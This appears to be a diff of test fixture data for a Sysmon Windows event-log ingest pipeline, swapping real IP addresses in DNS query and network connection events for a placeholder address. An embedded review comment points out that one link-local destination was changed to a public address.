Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -4288,7 +4288,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.101", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -4336,7 +4336,7 @@
 "ProcessId": "2736",
 "QueryName": "pre-usermatch.targeting.unrulymedia.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;",
+ "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.137",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4355,7 +4355,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -4364,7 +4364,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4384,7 +4384,7 @@
 "event_data": {
 "QueryName": "farm.plista.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;",
+ "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.141",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4406,7 +4406,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -4433,7 +4433,7 @@
 },
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;",
+ "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.168",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4459,7 +4459,7 @@
 "ProcessId": "4",
 "Protocol": "udp",
 "SourceHostname": "vagrant-2012-r2.local.crowbird.com",
- "DestinationIp": "169.254.180.25",
+ "DestinationIp": "89.160.20.156",
 "DestinationIsIpv6": "false",
 "Image": "System",
 "User": "NT AUTHORITY\\SYSTEM",
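Review bot: In the -4459 hunk the DestinationIp `169.254.180.25` was not a public address to begin with (169.254.0.0/16 is link-local), so replacing it with `89.160.20.156` goes beyond the stated purpose of the change and alters what the fixture exercises: a NetBIOS-ns (port 137) query to a link-local peer now reads as UDP traffic from the private source 10.0.2.15 to a public host. The matching `event.original` in the -4489 hunk was changed the same way. If the pipeline enriches destination.ip with GeoIP or AS data, the expected document for this event should now carry those fields as well; that part of the document is outside this hunk, so it is worth confirming it was updated, or keeping the original link-local value if the event was meant to stay internal.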
@@ -4489,7 +4489,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" } }, 
@@ -4830,7 +4830,7 @@ { "@timestamp": "2021-05-05T15:30:51.704Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4847,7 +4847,7 @@ "time_created": "2019-07-18T03:34:04.692Z", "level": "information", "event_data": { - "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.169", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -4885,7 +4885,7 @@
 "ProcessId": "2736",
 "QueryName": "sync.mathtag.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;"
+ "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;"
 },
 "record_id": 141,
 "event_id": "22",
@@ -4905,7 +4905,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 